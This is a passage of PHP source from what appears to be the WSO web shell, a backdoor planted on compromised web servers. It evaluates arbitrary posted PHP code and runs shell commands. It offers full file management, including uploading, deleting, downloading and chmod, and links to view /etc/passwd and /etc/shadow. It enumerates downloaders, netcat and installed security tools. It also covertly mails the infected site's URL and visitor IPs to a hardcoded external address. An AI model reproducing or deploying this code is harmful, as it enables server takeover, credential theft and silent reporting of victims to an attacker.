named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo 